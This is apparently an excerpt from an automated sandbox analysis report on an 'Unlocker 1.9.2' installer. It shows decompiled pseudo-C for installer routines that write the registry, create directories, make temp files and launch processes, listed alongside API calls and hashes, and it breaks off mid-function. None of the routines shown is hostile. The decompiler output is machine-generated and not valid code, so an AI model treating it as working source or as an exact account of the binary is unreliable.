                                                                                                                                                              • Instruction ID: 12be5ee7c0a04460072f4a22dab7179149aa53ae67e7a866020ad89d1ba75591
                                                                                                                                                              • Opcode Fuzzy Hash: 130aa79b9c983bd4e060f1967264d3b910e55c34024405a00a28679471b0e476
                                                                                                                                                              • Instruction Fuzzy Hash: 5831C071C00128BBDF216FA5CD88EAE7E79EF04368F10423AF524762E0C7795D419BA8
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00402303 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 969 402303-402349 call 402aeb call 4029f6 * 2 RegCreateKeyExA 976 40288b-40289a 969->976 977 40234f-402357 969->977 979 402367-40236a 977->979 980 402359-402366 call 4029f6 lstrlenA 977->980 983 40237a-40237d 979->983 984 40236c-402379 call 4029d9 979->984 980->979 986 40238e-4023a2 RegSetValueExA 983->986 987 40237f-402389 call 402e5b 983->987 984->983 991 4023a4 986->991 992 4023a7-402483 RegCloseKey 986->992 987->986 991->992 992->976
                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E00402303(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				long _t22;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402AEB(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029F6(2);
				_t18 = E004029F6(0x11);
				_t30 =  *0x423f30; // 0x100
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27); // executed
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029F6(0x23);
						_t19 = lstrlenA(0x40a350) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029D9(3);
						 *0x40a350 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E5B( *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a350, 0xc00);
					}
					_t22 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a350, _t19); // executed
					if(_t22 == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey(); // executed
				}
				 *0x423f08 =  *0x423f08 +  *(_t37 - 4);
				return 0;
			}












                                                                                                                                                              0x00402304
                                                                                                                                                              0x00402309
                                                                                                                                                              0x00402313
                                                                                                                                                              0x0040231d
                                                                                                                                                              0x00402320
                                                                                                                                                              0x0040232a
                                                                                                                                                              0x0040233a
                                                                                                                                                              0x00402341
                                                                                                                                                              0x00402349
                                                                                                                                                              0x00402357
                                                                                                                                                              0x0040235b
                                                                                                                                                              0x00402366
                                                                                                                                                              0x00402366
                                                                                                                                                              0x0040236a
                                                                                                                                                              0x0040236e
                                                                                                                                                              0x00402374
                                                                                                                                                              0x00402379
                                                                                                                                                              0x00402379
                                                                                                                                                              0x0040237d
                                                                                                                                                              0x00402389
                                                                                                                                                              0x00402389
                                                                                                                                                              0x0040239a
                                                                                                                                                              0x004023a2
                                                                                                                                                              0x004023a4
                                                                                                                                                              0x004023a4
                                                                                                                                                              0x004023a7
                                                                                                                                                              0x0040247d
                                                                                                                                                              0x0040247d
                                                                                                                                                              0x0040288e
                                                                                                                                                              0x0040289a

                                                                                                                                                              APIs
                                                                                                                                                              • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 00402341
                                                                                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv5446.tmp,00000023,?,?,?,00000100,?,?,?,00000011,00000002), ref: 00402361
                                                                                                                                                              • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsv5446.tmp,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 0040239A
                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsv5446.tmp,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 0040247D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateValuelstrlen
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsv5446.tmp
                                                                                                                                                              • API String ID: 1356686001-4217690468
                                                                                                                                                              • Opcode ID: dbb0ac2dea1b540987cf841eb3ee0772f6bb7d6697134c80a962b157f725af8d
                                                                                                                                                              • Instruction ID: 0c84a363429982d99d3a5a271a87b4b8d308e401ccf86a25fc22d5166c0076e5
                                                                                                                                                              • Opcode Fuzzy Hash: dbb0ac2dea1b540987cf841eb3ee0772f6bb7d6697134c80a962b157f725af8d
                                                                                                                                                              • Instruction Fuzzy Hash: 781163B1E00209BFEB10AFA4DE49EAF767CFB40358F10413AF901B61D0D6B85D019669
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029F6(0xfffffff0);
				_t10 = E00405564(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E004054FB(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E004059DD("C:\\Program Files\\Unlocker", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                                                                                                                              0x004015b3
                                                                                                                                                              0x004015ba
                                                                                                                                                              0x004015bd
                                                                                                                                                              0x004015c2
                                                                                                                                                              0x004015c6
                                                                                                                                                              0x004015c8
                                                                                                                                                              0x004015d0
                                                                                                                                                              0x004015d6
                                                                                                                                                              0x004015d8
                                                                                                                                                              0x004015db
                                                                                                                                                              0x004015e3
                                                                                                                                                              0x004015f0
                                                                                                                                                              0x004015fd
                                                                                                                                                              0x004015fd
                                                                                                                                                              0x004015f2
                                                                                                                                                              0x004015f3
                                                                                                                                                              0x004015fb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004015fb
                                                                                                                                                              0x004015f0
                                                                                                                                                              0x00401600
                                                                                                                                                              0x00401603
                                                                                                                                                              0x00401605
                                                                                                                                                              0x00401606
                                                                                                                                                              0x004015c8
                                                                                                                                                              0x0040160d
                                                                                                                                                              0x0040162d
                                                                                                                                                              0x00402164
                                                                                                                                                              0x0040160f
                                                                                                                                                              0x00401611
                                                                                                                                                              0x0040161c
                                                                                                                                                              0x00401622
                                                                                                                                                              0x00401622
                                                                                                                                                              0x0040288e
                                                                                                                                                              0x0040289a

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00405564: CharNextA.USER32(00405316,?,C:\,00000000,004055C8,C:\,C:\,?,?,00000000,00405316,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000), ref: 00405572
                                                                                                                                                                • Part of subcall function 00405564: CharNextA.USER32(00000000), ref: 00405577
                                                                                                                                                                • Part of subcall function 00405564: CharNextA.USER32(00000000), ref: 00405586
                                                                                                                                                              • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                                                                              • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Program Files\Unlocker,00000000,00000000,000000F0), ref: 00401622
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Program Files\Unlocker, xrefs: 00401617
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                                                              • String ID: C:\Program Files\Unlocker
                                                                                                                                                              • API String ID: 3751793516-1747243819
                                                                                                                                                              • Opcode ID: eca45e4f265b5310bf3876cc38f450248989b20858a3f8b45370c7433c2b44d3
                                                                                                                                                              • Instruction ID: ffaaac8e814952d4dd163c137c14166a37b00a477d69e33f5cc6849720afcf5a
                                                                                                                                                              • Opcode Fuzzy Hash: eca45e4f265b5310bf3876cc38f450248989b20858a3f8b45370c7433c2b44d3
                                                                                                                                                              • Instruction Fuzzy Hash: 86010831908180ABDB116F795D44D6F27B0DA52365728473BF491B22E2C23C4942962E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004056E3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004056E3(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                                                                                                              0x004056e7
                                                                                                                                                              0x004056ed
                                                                                                                                                              0x004056ee
                                                                                                                                                              0x004056ee
                                                                                                                                                              0x004056ef
                                                                                                                                                              0x004056f6
                                                                                                                                                              0x00405700
                                                                                                                                                              0x0040570d
                                                                                                                                                              0x00405710
                                                                                                                                                              0x00405718
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040571c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040571e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040571e
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004056F6
                                                                                                                                                              • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405710
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                                              • String ID: "C:\Users\user\Desktop\Unlocker1.9.2.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                              • API String ID: 1716503409-1276116323
                                                                                                                                                              • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                                                                              • Instruction ID: 090c9869d25c952b380026dfe3028592f3e254e5657c021594612e0629f183dd
                                                                                                                                                              • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                                                                              • Instruction Fuzzy Hash: AFF0A736348204B7D7104F55EC04B9B7F5DDF91750F14C027F944DA1C0D6B1995597A5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00404568 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 53%
                                                                                                                                                              			E00404568(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				int _t29;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E004059FF(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E004059FF(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E004059FF(_t34, 0, 0x420478, 0x420478, _a8);
				wsprintfA(_t26 + lstrlenA(0x420478), "%u.%u%s%s");
				_t29 = SetDlgItemTextA( *0x423658, _a4, 0x420478); // executed
				return _t29;
			}














                                                                                                                                                              0x00404570
                                                                                                                                                              0x00404574
                                                                                                                                                              0x0040457c
                                                                                                                                                              0x0040457f
                                                                                                                                                              0x00404580
                                                                                                                                                              0x00404582
                                                                                                                                                              0x00404584
                                                                                                                                                              0x00404587
                                                                                                                                                              0x00404587
                                                                                                                                                              0x0040458e
                                                                                                                                                              0x00404594
                                                                                                                                                              0x00404594
                                                                                                                                                              0x0040459b
                                                                                                                                                              0x004045a6
                                                                                                                                                              0x004045a7
                                                                                                                                                              0x004045aa
                                                                                                                                                              0x004045aa
                                                                                                                                                              0x004045b7
                                                                                                                                                              0x004045c2
                                                                                                                                                              0x004045c5
                                                                                                                                                              0x004045d7
                                                                                                                                                              0x004045de
                                                                                                                                                              0x004045df
                                                                                                                                                              0x004045ee
                                                                                                                                                              0x004045fe
                                                                                                                                                              0x00404611
                                                                                                                                                              0x0040461a

                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(00420478,00420478,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404488,000000DF,0000040F,00000400,00000000), ref: 004045F6
                                                                                                                                                              • wsprintfA.USER32 ref: 004045FE
                                                                                                                                                              • SetDlgItemTextA.USER32 ref: 00404611
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                              • String ID: %u.%u%s%s
                                                                                                                                                              • API String ID: 3540041739-3551169577
                                                                                                                                                              • Opcode ID: fbb595e432194c305246c6f0f4e29bd605609ecb9101d11c6153431d6f6663c0
                                                                                                                                                              • Instruction ID: de100ae33fd703a766e80fabf1c0ef7e237f6bef08e04a4196497c65211e5d03
                                                                                                                                                              • Opcode Fuzzy Hash: fbb595e432194c305246c6f0f4e29bd605609ecb9101d11c6153431d6f6663c0
                                                                                                                                                              • Instruction Fuzzy Hash: 331104B370012477DB10666D9C05EAF329DDBC6334F14023BFA2AF61D1E9388C1186E8
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00401BAD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                              			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029D9(3);
				 *(_t55 + 8) = E004029D9(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029F6(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029F6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029F6();
					_t28 = E004029F6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28); // executed
					goto L10;
				} else {
					_t52 = E004029D9();
					_t37 = E004029D9();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8)); // executed
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E0040593B();
				}
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                                                                                                                              0x00401bb6
                                                                                                                                                              0x00401bc2
                                                                                                                                                              0x00401bc5
                                                                                                                                                              0x00401bce
                                                                                                                                                              0x00401bce
                                                                                                                                                              0x00401bd1
                                                                                                                                                              0x00401bd5
                                                                                                                                                              0x00401bde
                                                                                                                                                              0x00401bde
                                                                                                                                                              0x00401be1
                                                                                                                                                              0x00401be5
                                                                                                                                                              0x00401be7
                                                                                                                                                              0x00401c34
                                                                                                                                                              0x00401c36
                                                                                                                                                              0x00401c3f
                                                                                                                                                              0x00401c47
                                                                                                                                                              0x00401c4a
                                                                                                                                                              0x00401c4a
                                                                                                                                                              0x00401c53
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401be9
                                                                                                                                                              0x00401bf0
                                                                                                                                                              0x00401bf2
                                                                                                                                                              0x00401bfa
                                                                                                                                                              0x00401bfd
                                                                                                                                                              0x00401c25
                                                                                                                                                              0x00401c59
                                                                                                                                                              0x00401c59
                                                                                                                                                              0x00401bff
                                                                                                                                                              0x00401c0d
                                                                                                                                                              0x00401c15
                                                                                                                                                              0x00401c18
                                                                                                                                                              0x00401c18
                                                                                                                                                              0x00401bfd
                                                                                                                                                              0x00401c5c
                                                                                                                                                              0x00401c5f
                                                                                                                                                              0x00401c65
                                                                                                                                                              0x00402833
                                                                                                                                                              0x00402833
                                                                                                                                                              0x0040288e
                                                                                                                                                              0x0040289a

                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                                                                                                                              • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                              • String ID: !
                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                              • Opcode ID: a21e9fedaf10b3d0faf8ff8eb7872d1ba6ab3a41dfe2fcd52b90142743086bd6
                                                                                                                                                              • Instruction ID: 089b6e11c3ee5c2ceb15467343933f82bc3488a694e04e66c57418204d538f9a
                                                                                                                                                              • Opcode Fuzzy Hash: a21e9fedaf10b3d0faf8ff8eb7872d1ba6ab3a41dfe2fcd52b90142743086bd6
                                                                                                                                                              • Instruction Fuzzy Hash: B321C4B1A44209BFEF01AFB4CE4AAAE7B75EF40344F14053EF602B60D1D6B84980E718
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0040523D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040523D(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422480->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422480,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                                                                              0x00405246
                                                                                                                                                              0x00405262
                                                                                                                                                              0x0040526a
                                                                                                                                                              0x0040526f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405275
                                                                                                                                                              0x00405279

                                                                                                                                                              APIs
                                                                                                                                                              • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422480,Error launching installer), ref: 00405262
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040526F
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040523D
                                                                                                                                                              • Error launching installer, xrefs: 00405250
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                                                                                                                                              • API String ID: 3712363035-1785902839
                                                                                                                                                              • Opcode ID: 1f2f9ff3088062fdf2c67fe66ccdb0f341c5896b9e6aafa6ba1adbb34377fffc
                                                                                                                                                              • Instruction ID: 0a3d69d2a3401d9d63374a1600280413a6fd3692a6ba6d2da32d4f839eaa01ec
                                                                                                                                                              • Opcode Fuzzy Hash: 1f2f9ff3088062fdf2c67fe66ccdb0f341c5896b9e6aafa6ba1adbb34377fffc
                                                                                                                                                              • Instruction Fuzzy Hash: BEE0E674A1010ABBDB00EF64DD09D6B7B7CFB00304B408621E911E2150D774E4108A79
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00401F51 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 60%
                                                                                                                                                              			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
